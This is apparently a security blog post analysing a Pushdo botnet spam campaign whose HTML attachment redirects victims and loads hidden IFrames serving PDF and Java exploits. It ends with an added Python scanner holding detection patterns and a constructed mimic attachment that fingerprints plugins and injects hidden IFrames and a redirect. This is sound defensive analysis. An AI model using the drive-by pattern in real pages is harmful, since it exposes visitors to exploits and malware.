Over the last couple of days we have been seeing numerous malicious and Canadian Pharmacy spam campaigns sent from the Pushdo botnet. This campaign features an HTML file as an attachment and some subject lines, including one that mentions the FIFA World Cup, that may fool unwary recipients. Some of the email subjects we have seen are:
FIFA World Cup South Africa… bad news
[Recipient Domain] account Information
[Random Email Address] has sent you a birthday ecard.
Reset your Twitter password
The HTML file attachment contains the following JavaScript:
We have seen several different variations of this script, but all have the same purpose, which is concealed by some very basic obfuscation. If we remove the parts of this script that do nothing and clean up some of the text, we get the script below:
If this attachment is opened in a browser with JavaScript enabled, the script redirects the browser to the file z.htm (shown below) on one of several different web servers.
This page waits for three seconds and then redirects the browser to a Canadian Pharmacy website. While waiting, a hidden IFrame is loaded. We have removed some of the obfuscation to make the script in this IFrame more readable:
This script checks each of the browser's plugins to see if any contain the words 'Adobe Acrobat' or 'Adobe PDF' in their name. This looks for any Adobe PDF reader and, if one is found, adds an IFrame to the page pointing to a malicious PDF file.
The script then checks if Java (that's Sun Microsystems' Java, not JavaScript) is enabled, and if so, adds an IFrame that exploits vulnerabilities in Java.
The exploits install an executable named game.exe, which we have not yet analyzed and which is not detected by many anti-virus products.
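As an added example (not the blog's code and not the attachment itself), here is a small Python triage check that a mail gateway or analyst could run over an HTML attachment: it undoes the simple obfuscation described above (string concatenation, String.fromCharCode, URL and HTML escapes) and flags the combination of plugin/Java fingerprinting with a hidden IFrame or redirect. The indicator names, helper functions and the two sample attachments are constructed for this example and assume nothing beyond the behaviour the post describes.

```python
import html
import re
from urllib.parse import unquote
# Indicators for the behaviour the post describes (matched case-insensitively).
INDICATORS = {
    "plugin_enum": r"navigator\.plugins",
    "adobe_plugin_check": r"Adobe\s*(Acrobat|PDF)",
    "java_check": r"navigator\.javaEnabled\s*\(",
    "hidden_iframe": r"<iframe[^>]*(width|height)\s*=\s*[\"']?0\b",
    "delayed_redirect": r"setTimeout\s*\(",
    "location_redirect": r"location(\.href)?\s*=(?!=)|location\.replace\s*\(",
    "meta_refresh": r"<meta[^>]*http-equiv\s*=\s*[\"']?refresh",
}
_CONCAT = re.compile(r"(['\"])([^'\"]*)\1\s*\+\s*(['\"])([^'\"]*)\3")
_CHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")

def normalize(text: str) -> str:
    """Undo the cheap obfuscation so the indicator regexes see plain strings."""
    text = unquote(html.unescape(text))  # &lt; and %3C -> <
    text = _CHARCODE.sub(lambda m: '"' + "".join(  # fromCharCode(60,...) -> "<..."
        chr(int(n)) for n in m.group(1).split(",") if n.strip()) + '"', text)
    while True:  # 'Ado' + 'be' -> 'Adobe', repeated until nothing changes
        joined = _CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), text)
        if joined == text:
            return text
        text = joined

def scan(attachment: str) -> dict:
    """Return which indicators fire on a de-obfuscated HTML attachment."""
    text = normalize(attachment)
    return {name: bool(re.search(pat, text, re.I | re.S)) for name, pat in INDICATORS.items()}

def is_suspicious(attachment: str) -> bool:
    """Fingerprinting alone or a redirect alone is common on legitimate pages;
    the two together is the drive-by shape the post describes."""
    hits = scan(attachment)
    fingerprints = hits["plugin_enum"] or hits["java_check"]
    delivers = hits["hidden_iframe"] or hits["location_redirect"] or hits["meta_refresh"]
    return fingerprints and delivers

# Constructed samples (not the real attachments): a mimic with .invalid hosts, and a harmless e-card.
SAMPLE_BAD = """<script>
var h = 'Ado' + 'be ' + 'PDF', p = navigator.plugins;
for (var i = 0; i < p.length; i++) if (p[i].name.indexOf(h) != -1)
  document.write(String.fromCharCode(60,105,102,114,97,109,101) + ' src="http://site.invalid/x.pdf" width=0 height=0></iframe>');
if (navigator.javaEnabled()) document.write('<iframe src="http://site.invalid/j.html" width=0 height=0></iframe>');
setTimeout(function () { window.location = 'http://pharmacy.invalid/'; }, 3000);
</script>"""
SAMPLE_OK = '<html><body><p>Happy birthday!</p><a href="http://example.com/card">View card</a></body></html>'
```

The normalisation is deliberately shallow; anything packed with eval or a real packer should go to a sandbox or a JavaScript emulator rather than a regex pass.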